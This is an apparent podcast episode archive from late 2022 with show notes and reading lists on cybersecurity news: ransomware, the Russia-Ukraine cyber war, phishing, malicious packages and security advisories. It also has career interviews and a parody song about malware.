On this episode of CyberWire-X, host Rick Howard, N2K’s CSO, and CyberWire’s Chief Analyst and Senior Fellow, discusses software supply chain lessons learned from the SolarWinds attack of 2020 with Hash Table members Rick Doten, the CISO for Healthcare Enterprises and Centene, Steve Winterfeld, Akamai's Advisory CISO, and Dawn Cappelli, Director of OT-CERT at Dragos, and in the second half of the show, Rick speaks with our episode sponsor, SolarWinds, CISO Tim Brown.

Women in Cybersecurity panel: A discussion on hidden figures of cyber skills gap. [Special Edition] Jan 02, 2023

On Thursday October 20, 2022, the CyberWire was pleased to host the annual Women in Cybersecurity Reception at the International Spy Museum in Washington, DC. This annual event brought together almost 300 people to highlight and celebrate the value and successes of women in the cybersecurity industry. The reception included an industry-led panel discussion called “The Hidden Impact of Cybersecurity’s Talent Gap on the Cyber-Enabled Community,” discussing cyber-enabled professionals who aren’t usually included in conversations around the cybersecurity skills gap. The panel, moderated by Simone Petrella of CyberVista, included perspectives from experts including Davida Gray of MindPoint Group, Jennifer Walsmith of Northrop Grumman, Kyla Guru of Bits N’ Bytes, and Amy Mushahwar from Alston & Bird.

Encore: LemonDucks evading detection. Dec 31, 2022

Scott Fanning from CrowdStrike's research team, joins Dave to discuss their work on "LemonDuck Targets Docker for Cryptomining Operations." LemonDuck is a well-known cryptomining botnet, and the research suggests attackers are attracted to the monetary gain from the recent boom in cryptocurrency.

LemonDuck was caught trying to disguise its attack against Docker by running an anonymous mining operation by the use of proxy pools. Scott shares how its unknown which organizations have been targeted and just how much cryptocurrency has been stolen.

The research can be found here:

LemonDuck Targets Docker for Cryptomining Operations

Interview Select: Nick Schneider of Arctic Wolf discusses why he believes 2023 will see a resurgence of ransomware and why the decline of crypto will not deter future ransomware actors. Dec 30, 2022

SHOW NOTES

This interview from October 28th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with Nick Schneider of Arctic Wolf to discuss why he believes 2023 will see a resurgence of ransomware and why the decline of crypto will not deter future ransomware actors.

Sisters, grifters, and shifters. [Hacking Humans Goes to the Movies] Dec 29, 2022

Thanks for joining us again for another episode of fun project brought to you by the team of Hacking Humans, the CyberWire's social engineering podcast. Hacking Humans co-host Dave Bittner is joined by Rick Howard in this series where they view clips from their favorite movies and television shows with examples of the social engineering scams and schemes you hear Dave and co-host Joe Carrigan talk about on Hacking Humans. In this episode, Dave and Rick watch each of the selected scenes, describe the on-screen action for you, and then they deconstruct what they saw. Grab your bowl of popcorn and join us for some fantastic scams and frauds.

On this episode, Dave and Rick are joined by guest contributor Amanda Fennell. You can find Amanda on Twitter at @Chi_from_afar.

Links to this episode's clips if you'd like to watch along:

Dave's clip from the movie Zombieland
Rick's clip from the movie Traveller
Amanda's clip from the movie The Girl with the Dragon Tattoo

Interview Select: Diana Kelley, CSO & Co-founder of Cybrize to discuss the need for innovation and entrepreneurship in cybersecurity. Dec 28, 2022

This interview from September 16th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with Diana Kelley, CSO & Co-founder of Cybrize to discuss the need for innovation and entrepreneurship in cybersecurity.

Interview Select: MK Palmore from Google Cloud talks about why collective cybersecurity ultimately depends on having a diverse, skilled workforce. Dec 27, 2022

This interview from September 30th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with MK Palmore from Google Cloud to talk about why collective cybersecurity ultimately depends on having a diverse, skilled workforce.

Research Briefing: Spearphishing against Japanese political entities. Trojanized Windows 10 installers target Ukraine. XLL files abused to deliver malware. Dec 26, 2022

Spearphishing against Japanese political entities. Trojanized Windows 10 installers target Ukraine. XLL files abused to deliver malware.

The CyberWire: The 12 Days of Malware.[Special Editions] Dec 25, 2022

Merry Christmas and Happy Holidays from the CyberWire and our friends! Enjoy our rendition of the 12 Days of Malware created by Dave Bittner and performed by Dave and friends: Rachel Tobac, Jayson Street, Ron Eddings & Chris Cochran, Ray [Redacted], Dinah Davis, Camille Stewart, Rick Howard, Michelle Dennedy, Jack Rhysider, Johannes Ullrich, and Charity Wright. Ba dum bum bum. Sing along if you are game! Check out our video for the full effect!

The 12 Days of Malware lyrics

On the first day of Christmas, my malware gave to me:

A keylogger logging my keys.

On the second day of Christmas, my malware gave to me:

2 Trojan Apps...

And a keylogger logging my keys.

On the third day of Christmas, my malware gave to me:

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the fourth day of Christmas, my malware gave to me:

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the fifth day of Christmas, my malware gave to me:

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the sixth day of Christmas, my malware gave to me:

6 Passwords spraying...

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the seventh day of Christmas, my malware gave to me:

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the eighth day of Christmas, my malware gave to me:

8 Worms a wiping...

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the ninth day of Christmas, my malware gave to me:

9 Rootkits rooting...

8 Worms a wiping...

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the tenth day of Christmas, my malware gave to me:

10 Darknet markets...

9 Rootkits rooting...

8 Worms a wiping...

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days! (Bah-dum-dum-dum!)

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the eleventh day of Christmas, my malware gave to me:

11 Phishers phishing...

10 Darknet markets...

9 Rootkits rooting...

8 Worms a wiping...

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days! (Bah-dum-dum-dum!)

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

On the twelfth day of Christmas, my malware gave to me:

12 Hackers hacking...

11 Phishers phishing...

10 Darknet markets...

9 Rootkits rooting...

8 Worms a wiping...

7 Scripts a scraping...

6 Passwords spraying...

5 Zero Days!

4 Crypto scams...

3 Web shells...

2 Trojan Apps...

And a keylogger logging my keys.

Encore: Vulnerabilities in IoT devices. Dec 24, 2022

Dr. May Wang, CTO of IoT Security at Palo Alto Networks, joins Dave Bittner to discuss their findings detailed in Unit 42's "Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization" research. Unit 42 recently set out to better understand how well hospitals and other healthcare providers are doing in securing smart infusion pumps, which are network-connected devices that deliver medications and fluids to patients. This topic is of critical concern because security lapses in these devices have the potential to put lives at risk or expose sensitive patient data.

Unit 42's discovery of security gaps in three out of four infusion pumps that they reviewed highlights the need for the healthcare industry to redouble efforts to protect against known vulnerabilities, while diligently following best practices for infusion pumps and hospital networks. May walks us through Unit 42's work.

The research can be found here:

Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization

PolyVice and Royal ransomware make nuisances of themselves. US warns that KillNet can be expected to go after the healthcare sector. CISA’s plans for stakeholder engagement. Dec 23, 2022

The Vice Society may be upping its marketing game. Royal ransomware may have a connection to Conti. Royal delivers ransom note by hacked printer. KillNet goes after healthcare. CISA's Stakeholder Engagement Strategic Plan. Adam Meyers from CrowdStrike looks at cyber espionage. Giulia Porter from RoboKiller does not want to talk to you about your car’s extended warranty. And holiday wishes to all.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/245

Selected reading.

Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Development (SentinelOne)

Vice Society ransomware gang switches to new custom encryptor (BleepingComputer)

Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks (Trend Micro)

Researchers Link Royal Ransomware to Conti Group (SecurityWeek)

Major Australian university dealing with suspected cybersecurity attack (7NEWS)

Printers at Queensland's second-largest university spit out ransomware messages after cyber attack (ABC)

Pro-Russian Hacktivist Group ‘KillNet’ Threat to HPH Sector (HC3)

HHS alert warns KillNet hacktivist group targeted US healthcare entity (SC Media)

HC3 Analyst Note TLP Clear Pro-Russian Hacktivist Group Killnet Threat to HPH Sector December 22, 2022 | AHA (American Hospital Association)

Strategic Plan for Stakeholder Engagement (CISA)

Online fraud, some targeting shoppers and investors, others going after e-commerce retailers. Updates on the cyber phases of Russia’s hybrid war. Dec 22, 2022

The FBI warns of malicious advertising. A new gang makes an unwelcome appearance in the holiday season. Ukraine will receive more Starlink terminals after all. Cyber phases of the hybrid war: a view from Kyiv–the bears and their adjuncts are opportunistic agents of chaos. Caleb Barlow thinks boards of directors need to up their cyber security game. Our guest is AJ Nash from ZeroFox with a look at legislative restrictions on TikTok. And reports say that US National Cyber Director Chris Inglis is preparing to retire. We wish him the best of luck.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/244

Selected reading.

Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users (FBI)

A sophisticated fraud ring is waging war on commerce, using rapidly changing tactics (Signifyd)

Ukraine to Get Thousands More Starlink Antennas, Minister Says (Bloomberg)

Ukraine’s Cyber Units Aim to Retain Staff, Keep Services Stable as War Enters Year Two (Wall Street Journal)

Top Biden cybersecurity adviser to step down (CNN)

Chris Inglis to resign as national cyber director (CyberScoop).

First-ever national cyber director Chris Inglis set to retire in coming months: sources (Axios).

White House cyber adviser to resign (The Hill)

Chris Inglis, Biden's top cyber adviser, plans to leave government in coming months (POLITICO).

White House Cyber Director Chris Inglis to Step Down (Bank Info Security)

Developing a banking Trojan into a newer, more effective form. Cyberattacks on media outlets. Abuse of AWS Elastic IP transfer. Notes on the hybrid war. And cybercrooks are inspired by Breaking Bad. Dec 21, 2022

The Godfather banking Trojan has deep roots in older code. FuboTV was disrupted around its World Cup coverage. The Guardian has been hit with an apparent ransomware attack. A threat actor abuses AWS Elastic IP transfer. Moldova may be receiving more Russian attention in cyberspace. CISA releases six industrial control system advisories. Ben Yelin looks at legislation addressing health care security. Our guest is Hugh Njemanze of Anomali with advice on preparing for the holiday break. And criminals are impersonating other criminals' underworld souks.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/243

Selected reading.

Godfather: A banking Trojan that is impossible to refuse (Group-IB)

FuboTV outage during World Cup semifinal was caused by cyberattack (Record)

Guardian hit by serious IT incident believed to be ransomware attack (the Guardian)

Elastic IP Hijacking — A New Attack Vector in AWS (Mitiga)

Telegram Hack Exposes Growing Russian Cyber Threat in Moldova (Balkan Insight)

Fuji Electric Tellus Lite V-Simulator (CISA)

Rockwell Automation GuardLogix and ControlLogix controllers (CISA)

ARC Informatique PcVue (CISA)

Rockwell Automation MicroLogix 1100 and 1400 (CISA)

Delta 4G Router DX-3021 (CISA)

Prosys OPC UA Simulation Server (CISA)

The scammers who scam scammers on cybercrime forums: Part 3 (Sophos News)

Warnings on SentinelSneak. The rise of malicious XLLs. Updates from Russia’s hybrid war. An unusually loathsome campaign targets children. Dec 20, 2022

SentinelSneak is out in the wild. XLLs for malware delivery. CERT-UA warns of attacks against the DELTA situational awareness system. FSB cyber operations against Ukraine. Trends in the cyber phases of Russia's hybrid war. Mr. Security Answer Person John Pescatore offers his sage wisdom. Microsoft’s Ann Johnson from Afternoon Cyber Tea speaks with Dr. Chenxi Wang from Rain Capital. And an unusually unpleasant sextortion campaign.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/242

Selected reading.

SentinelSneak is not a legitimate SDK. (CyberWire)

SentinelSneak: Malicious PyPI module poses as security software development kit (ReversingLabs)

Malicious Python Trojan Impersonates SentinelOne Security Client (Dark Reading)

Malicious ‘SentinelOne’ PyPI package steals data from developers (BleepingComputer)

Cisco research on XLL Abuse. (CyberWire)

Threat Spotlight: XLLing in Excel - threat actors using malicious add-ins (Cisco Talos Blog)

Ukraine at D+299: Cyber operations 300 days into the war. (CyberWire)

Cyber Dimensions of the Armed Conflict in Ukraine (CyberPeace Institute)

Ukraine's DELTA military system users targeted by info-stealing malware (BleepingComputer)

Ukraine's Delta Military Intel System Hit by Attacks (Infosecurity Magazine)

Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine (Unit 42)

FBI and Partners Issue National Public Safety Alert on Financial Sextortion Schemes | Federal Bureau of Investigation (Federal Bureau of Investigation)

HSI, federal partners issue national public safety alert on sextortion schemes (US Immigration and Customs Enforcement)

BEC gets into bulk food theft. BlackCat ransomware update. Epic Games’ settlement with FTC. InfraGard data taken down. More on the hybrid war. And Twitter asks for the voice of the people. Dec 19, 2022

BEC takes aim at physical goods (including food). BlackCat ransomware activity increases. Epic Games settles an FTC regulatory case. The InfraGard database was pulled from a dark web auction site. CISA releases forty-one ICS advisories. Rick Howard interviews author Andy Greenberg. Rob Boyce from Accenture examines holiday cyber threats. The growing value of open source intelligence. Twitter says vox populi, vox dei.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/241

Selected reading.

FBI, FDA OCI, and USDA Release Joint Cybersecurity Advisory Regarding Business Email Compromise Schemes Used to Steal Food (CISA)

Colombian energy supplier EPM hit by BlackCat ransomware attack (BleepingComputer)

Events D.C. data published online in apparent ransomware attack (Washington Post)

Fortnite Video Game Maker Epic Games to Pay More Than Half a Billion Dollars over FTC Allegations of Privacy Violations and Unwanted Charges (Federal Trade Commission)

Hacker Halts Sale of FBI's High-Profile InfraGard Database (HackRead)

CISA Releases Forty-One Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency)

Russia’s Wartime Cyber Operations in Ukraine: Military Impacts, Influences, and Implications (Carnegie Endowment for International Peace)

How open-source intelligence has shaped the Russia-Ukraine war (GOV.UK)

Front-line video makes Ukrainian combat some of history’s most watched (Washington Post)

Elon Musk Polls Twitter Users, Asking Whether He Should Step Down (Wall Street Journal)

Musk asks: Should I stay as CEO? (Computing)

Elon Musk’s Twitter Poll Shows Users Want Him to Step Down (Wall Street Journal)

Elon Musk’s Twitter poll: 10 million say he should step down (the Guardian)

Strategies to get the most out of your toolsets. [CyberWire-X] Dec 18, 2022

With a recession looming, many business leaders are looking for ways to cut spending wherever possible. And while tool bloat affects many security teams, it can be a challenging problem to tackle for a couple of reasons. First, there’s the fear that security will be lost if a tool is removed. Second, there’s the daunting task of unraveling complex systems. And finally, there’s the perennial talent shortage. Like all challenges in security, they’re made even worse by the fact that there’s not enough people able to tackle them.

During this CyberWire-X episode, host Rick Howard, the CyberWire’s CISO, Chief Analyst and Senior Fellow, speaks with Hash Table member Ted Wagner, the CSO of SAP National Security Services, and host Dave Bittner speaks with sponsor ExtraHop Senior Technical Marketing Manager Jamie Moles. They discuss solutions to help business and security leaders to not just address these challenges, but to get more out of their tooling as they do. They discuss strategies for how to determine which tools you actually need and which you can get rid of, as well as the step-change benefits that can be realized when you consolidate, automate, and integrate your security solutions.

Don Pezet: Stepping stones are the start of your career. [CTO] [Career Notes] Dec 18, 2022

Don Pezet, CTO of ACI Learning, sits down to share his over 25 years of experience in the industry. Don previously spent time as a field engineer in the financial and insurance industries supporting networks around the world. He co-founded ITProTV in 2012 to help create the IT training that he wished he had when he got started in his IT career. He also shares insights for anyone else wishing to pursue IT, no matter their age or past experience. Don explains how important stepping stones are as you get into this field, stating "know that that first job you get is probably not going to be the job you want to have your whole life, but it's a stepping stone that leads to where you want to get." Don started teaching on the side as well as working in the IT field and explains how much his teaching skills come in handy to help him with his leadership skills, which in turn helps him to be a better CTO, helping his customers. We thank Don for sharing his story.

Hijacking holiday spirit with phishing scams. [Research Saturday] Dec 17, 2022

Or Katz from Akamai sits down with Dave to discuss research on highly sophisticated phishing scams and how they are abusing holiday sentiment. This particular threat, most recently has focused on Halloween deals, enticing victims with the chance to win a free prize, including from Dick’s Sporting Goods or Tumi Backpacks. It then requests credit card details to cover the cost of shipment.

From mid-September to the end of October 2022, Akamai's research were able uncover and track this threat. This kit mimics well known retail stores in hopes to hijack credit card information, feeding off of people's holiday spirit.

The research can be found here:

Highly Sophisticated Phishing Scams Are Abusing Holiday Sentiment

Malicious apps do more than extort predatory loans. A Facebook account recovery scam. Notes from the hybrid war. Goodbye SHA-1, hello Leviathans. Dec 16, 2022

A predatory loan app is discovered embedded in mobile apps. Facebook phishing. GPS disruptions are reported in Russian cities. NSA warns against dismissing Russian offensive cyber capabilities. Farewell, SHA-1. Kevin Magee from Microsoft looks at cyber signals. Our guest is Jason Witty of USAA to discuss the growing risk from quantum computing. And welcome to the world, Leviathans.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/240

Selected reading.

Zimperium teams discover new malware in Flutter developed apps (SecurityBrief Asia)

Meta-Phish: Facebook Infrastructure Used in Phishing Attack Chain (Trustwave)

GPS Signals Are Being Disrupted in Russian Cities (WIRED)

NSA cyber director warns of Russian digital assaults on global energy sector (CyberScoop)

Russia's cyber war machine in Ukraine hasn't lived up to Western hype. Report analyses why (ThePrint)

NIST Retires SHA-1 Cryptographic Algorithm (NIST)

Historic activation of the U.S. Army’s 11th Cyber Battalion (DVIDS)

Updates on the cyber phases of a hybrid war. Alleged booters busted. Progress report from the US anti-ransomware task force. Suspicion in AIIMS hack turns toward China. Dec 15, 2022

Trojanized Windows 10 installers are deployed against Ukraine. Alleged booters have been collared, and their sites disabled. A progress report on US anti-ransomware efforts. Suspicion in a cyberattack against India turns toward China. Bryan Vorndran from the FBI’s Cyber Division talks about deep fakes. Our guest is Lisa Plaggemier from the National Cybersecurity Alliance (NCA) on the launch of their Historically Black Colleges and Universities Career Program. And hybrid war and fissures in the underworld.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/239

Selected reading.

Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government (Mandiant)

Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services (US Department of Justice)

Global crackdown against DDoS services shuts down most popular platforms | Europol (Europol)

Readout of Second Joint Ransomware Task Force Meeting (Cybersecurity and Infrastructure Security Agency)

US finds its ‘center of gravity’ in the fight against ransomware (The Record by Recorded Future)

AIIMS cyber attack may have originated in China, Hong Kong (The Times of India)

AIIMS Delhi Servers Were Hacked By Chinese, Damage Contained: Sources (NDTV.com)

Russia-Ukraine war reaches dark side of the internet (Al Jazeera)

InfraGard data for sale. Cyberespionage warnings. Data sharing practices. Malicious drivers with legitimate signatures. Patch Tuesday. Task Force KleptoCapture indicts five Russian nationals. Dec 14, 2022

The FBI’s InfraGard user data shows up for sale. An update on Iranian cyber operations. NSA warns of Chinese cyber threats. Challenges in sharing data for threat detection and prevention. Legitimately signed drivers are used in targeted attacks. Patch Tuesday addressed a lot of actively exploited issues. Tim Starks from the Washington Post Cybersecurity 202 shares his reporting on ICS vulnerabilities. Our guest is Mike Fey from Island with an introduction to the enterprise browser space. And the US indicts five Russian nationals on sanctions-evasion charges.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/238

Selected reading.

FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked (KrebsOnSecurity)

Would’ve, Could’ve, Should’ve…Did: TA453 Refuses to be Bound by Expectations (Proofpoint)

APT5: Citrix ADC Threat Hunting Guidance (NSA)

U.S. agency warns that hackers are going after Citrix networking gear (Reuters)

NSA Outs Chinese Hackers Exploiting Citrix Zero-Day (SecurityWeek)

Effect of data on Federal agencies' policies. (CyberWire)

I Solemnly Swear My Driver Is Up to No Good: Hunting for Attestation Signed Malware (Mandiant)

Driving Through Defenses | Targeted Attacks Leverage Signed Malicious Microsoft Drivers (SentinelOne)

SAP Security Patch Day December 2022 (Onapsis)

December 2022 Security Updates (Microsoft Security Response Center)

December Patch Tuesday Updates | 2022 - Syxsense Inc (Syxsense Inc)

Microsoft December 2022 Patch Tuesday fixes 2 zero-days, 49 flaws (BleepingComputer)

Microsoft Squashes Zero-Day, Actively Exploited Bugs in Dec. Update (Dark Reading)

Microsoft fixes exploited zero-day, revokes certificate used to sign malicious drivers (CVE-2022-44698) (Help Net Security)

Microsoft Releases December 2022 Security Updates (CISA)

Apple security updates (Apple Support)

We finally know why Apple pushed out that emergency 16.1.2 update (Macworld)

Why You Should Enable Apple’s New Security Feature in iOS 16.2 Right Now (Wirecutter)

Apple Releases Security Updates for Multiple Products (CISA)

Citrix ADC and Citrix Gateway Security Bulletin for CVE-2022-27518 (Citrix)

State-sponsored attackers actively exploiting RCE in Citrix devices, patch ASAP! (CVE-2022-27518) (Help Net Security)

Citrix Releases Security Updates for Citrix ADC, Citrix Gateway (CISA)

VMware Patches VM Escape Flaw Exploited at Geekpwn Event (SecurityWeek)

Experts detailed a previously undetected VMware ESXi backdoor (Security Affairs)

VMware Releases Security Updates for Multiple products (CISA)

Mozilla Releases Security Updates for Thunderbird and Firefox (CISA)

Adobe Patches 38 Flaws in Enterprise Software Products (SecurityWeek)

CISA Releases Three Industrial Control Systems Advisories (CISA)

Five Russian Nationals, Including Suspected FSB Officer, and Two U.S. Nationals Charged with Helping the Russian Military and Intelligence Agencies Evade Sanctions (US Department of Justice)

Russian Military and Intelligence Agencies Procurement Network Indicted in Brooklyn Federal Court (US Department of Justice)

Uber’s breach. Phishing in Ukraine’s in-boxes. What’s Russia been up to anyway? (Not the same thing, probably, NATO would be up to.) And the ransomware leader board. Dec 13, 2022

Uber sustains a third-party breach. A phishing campaign hits Ukrainian in-boxes. The enduring riddle of why Russian offensive cyber operations have failed in Ukraine. Joe Carrigan on credit card skimming. Carole Theriault describes a UK food store chain that uses facial recognition technology to track those with criminal or antisocial behavior. And 2023’s ransomware-as-a-service leader board.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/237

Selected reading.

Uber suffers new data breach after attack on vendor, info leaked online (BleepingComputer)

Uber has been hacked yet again with code and employee data released online (SiliconANGLE)

Uber hit by new data breach — what you need to know (Tom's Guide)

Uber’s data breach. (CyberWire)

Ukrainian railway, state agencies allegedly targeted by DolphinCape malware (The Record by Recorded Future)

Cyber Operations in Ukraine: Russia’s Unmet Expectations (Carnegie Endowment for International Peace)

The most prolific ransomware groups of 2022 (Searchlight Security)

Ransomware updates: TrueBot, Cl0p, and Royal. Iranian cyberattacks. An update on the cyberattack against the Met. Notes on the hybrid war, with a focus on allies and outside actors. Dec 12, 2022

TrueBot found in Cl0p ransomware attacks. Royal ransomware targets the healthcare sector. Recent Iranian cyber activity. A night at the opera: an update on the cyberattack against the Metropolitan Opera. New Cloud Atlas activity reported. Europe looks to the cybersecurity of its power grid. Rob Boyce from Accenture describes Dark web actors diversifying their toolsets. Rick Howard explains fractional CISOs. And international support for Ukrainian cyber defense continues, more extensively and increasingly overt.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/236

Selected reading.

Breaking the silence - Recent Truebot activity (Cisco Talos Blog)

New TrueBot Malware Variant Leveraging Netwrix Auditor Bug and Raspberry Robin Worm (The Hacker News)

TrueBot infections were observed in Clop ransomware attacks (Security Affairs)

Clop ransomware uses TrueBot malware for access to networks (BleepingComputer)

Royal Ransomware (US Department of Health and Human Services)

US Dept of Health warns of ‘increased’ Royal ransomware attacks on hospitals (The Record by Recorded Future)

Iran-Backed MuddyWater's Latest Campaign Abuses Syncro Admin Tool (Dark Reading)

MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics (The Hacker News)

New MuddyWater Campaign Uses Legitimate Remote Administration Tools to Deploy Malware (Cyber Security News)

Shows will go on at Met Opera despite cyber-attack that crashed network (ABC7 New York)

Cyberattack disrupts Metropolitan Opera (SC Media)

Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine (Check Point Research)

APT Cloud Atlas: Unbroken Threat (Positive Technologies)

European Electricity Sector Lacks Cyber Experts as Ukraine War Raises Hacking Risks (Wall Street Journal)

How the US has helped counter destructive Russian cyberattacks amid Ukraine war (The Hill)

The Australian company training Ukrainian veterans in cybersecurity (Australian Financial Review)

How Proton intends to thwart Russian cybercensorship with its VPN (HiTech Wiki)

Cyber Lessons Learned from the War in Ukraine (YouTube)

War in Ukraine Dominated Cybersecurity in 2022 (CNET)

Jameeka Aaron: Sometimes you just have to follow two paths. [CISO] [Career Notes] Dec 11, 2022

Jameeka Aaron, Chief Information Security Officer at Auth0, a product unit of Okta, sits down to share her story following two different paths that led her to where she is today. Jameeka has 20 years of IT and cybersecurity experience and has mitigated security risks at Nike, the U.S. Navy, and now Auth0. She joined the Navy not knowing what she wanted to do after high school and ended up becoming a Radioman, which is now titled IT. She shares her experiences of challenges she faced being the youngest, and the only woman, and the only woman of color in her group. She followed two different paths, getting an education as well as being in the Navy, and started her career at Lockheed Martin Mission Systems in San Diego. She eventually found her way to Auth0 in 2018. She says "I realized cybersecurity folks can do anything, everywhere. We're everywhere, we're in every industry and so I started to kind of say, I wanna work on programs that are fun for me." We thank Jameeka for sharing her story.

Commercial threat intelligence proves invaluable for the public sector. [CyberWire-X] Dec 11, 2022

Historically, the U.S. government has relied almost solely on its own intelligence analysis to inform strategic decisions. This has been especially true surrounding geopolitical events and nation-level cybersecurity situations.

However, the explosion of assets being connected to the internet, along with the fact that most critical infrastructure is owned by private sector organizations, means that commercially developed cyber threat intelligence is being generated at a faster pace than ever before.

In the Russia/Ukraine conflict, we saw how commercially generated satellite intelligence played a critical role in alerting the public and ensuring our allies were ready for an invasion. At LookingGlass, we believe commercial threat intelligence can provide similar anticipatory insight – and that it can be shared more easily and quickly than intelligence generated solely by the U.S. government.

Ultimately, the public and private sectors need to work together to protect the interests of the American people. Currently, both private industry and academia are targeted by foreign adversaries, just as are government agencies. This means that commercial entities also have access to adversary tactics, techniques, and procedures (TTPs) and indicators of compromise, and they have that access from a different perspective, which is valuable intelligence for the government.

On this episode of CyberWire-X, host Rick Howard, the CyberWire’s CISO, Chief Analyst and Senior Fellow, speaks with Hash Table member Wayne Moore, CISO at Simply Business, and host Dave Bittner speaks with Bryan Ware, CEO at episode sponsor LookingGlass Cyber Solutions. They’ll discuss why the U.S. government needs commercial cyber threat intelligence now more than ever before and how both the public and private sectors will benefit from closer, trusted cyber partnerships.

Cybersecurity during the World Cup. [Research Saturday] Dec 10, 2022

AJ Nash from ZeroFox sits down with Dave to discuss Cybersecurity threats including social engineering attacks planned surrounding the Qatar 2022 World Cup. The research shares some of the key threats we might see while the World Cup is happening this year.

Researchers say "During the World Cup, there will likely be threat actors aiming to acquire personal information or monetary value through phishing and scams." In the research we can find how the venue host is preparing for these claims of attacks.

The research can be found here:

Qatar 2022 World Cup Event Assessment

Cobalt Mirage deploys Drokbk malware. Zombinder in the C2C market. Impersonation scams. CISA releases three new ICS advisories. And criminals prey on other criminals. Dec 09, 2022

Cobalt Mirage deploys Drokbk malware. Zombinder in the C2C market. Impersonation scams: that's not Ukraine’s Ministry of Digital Transformation. On the cyber front, nothing new. CISA releases three new ICS advisories. Caleb Barlow on attack surface management. Mike Hamilton from Critical Insight explains how state and local governments apply for the $1 billion allocated by the feds for cybersecurity funding. And criminals prey on other criminals.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/235

Selected reading.

Drokbk Malware Uses GitHub as Dead Drop Resolver (Secureworks)

Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers (ThreatFabric)

Crypto Winter: Fraudsters Impersonate Ukraine’s Government to Steal NFTs and Cryptocurrency (DomainTools)

Danish defence ministry says its websites hit by cyberattack (Reuters)

Kela website hit by DoS attack (Yle)

Advantech iView (CISA)

AVEVA InTouch Access Anywhere (CISA)

Rockwell Automation Logix controllers (CISA)

The scammers who scam scammers on cybercrime forums: Part 1 (Sophos News)

Cyber-criminals Scammed Each Other Out of Millions in 2022 (Infosecurity Magazine)

The IT Army of Ukraine claims VTB DDoS. DPRK exploits Internet Explorer vulnerability. New variant of Babuk ransomware reported. Blind spots in air-gapped networks. And, dog and cat hacking. Dec 08, 2022

The IT Army of Ukraine claims responsibility for DDoS against a Russian bank. North Korea exploits an Internet Explorer vulnerability. A new variant of Babuk ransomware has been reported. Blind spots in air-gapped networks. Rob Boyce from Accenture has insights on the most recent ransomware trends. Our guest is Nathan Howe from Zscaler with the latest on Zero Trust. And the hacking of cats and dogs.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/234

Selected reading.

IT Army of Ukraine Hit Russian Banking Giant with Crippling DDoS Attack (HackRead)

Internet Explorer 0-day exploited by North Korean actor APT37 (Google)

Morphisec Discovers Brand New Babuk Ransomware Variant in Major Attack (PRWeb)

Bypassing air-gapped networks via DNS (Pentera)

What to Know About an Unlikely Vector for Cyber Threats: Household Pets (Insurance Journal)

Ransomware, third-party risk, cyberespionage, social engineering, and a software supply-chain threat.. Dec 07, 2022

Rackspace reacts to ransomware. Third-party incidents in New Zealand and the Netherlands. Russian intelligence goes phishing. Mustang Panda uses Russia's war as phishbait. A Malicious package is found in PyPi. Kevin Magee from Microsoft Canada shares thoughts on cybersecurity startups in an economic downturn. Our guest is IDology's Christina Luttrell to discuss how consumers feel about digital identity, fraud, security and data privacy. And a French-speaking investment scam.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/233

Selected reading.

Rackspace Technology Hosted Exchange Environment Update (Rackspace Technology)

Multiple government departments in New Zealand affected by ransomware attack on IT provider (The Record by Recorded Future)

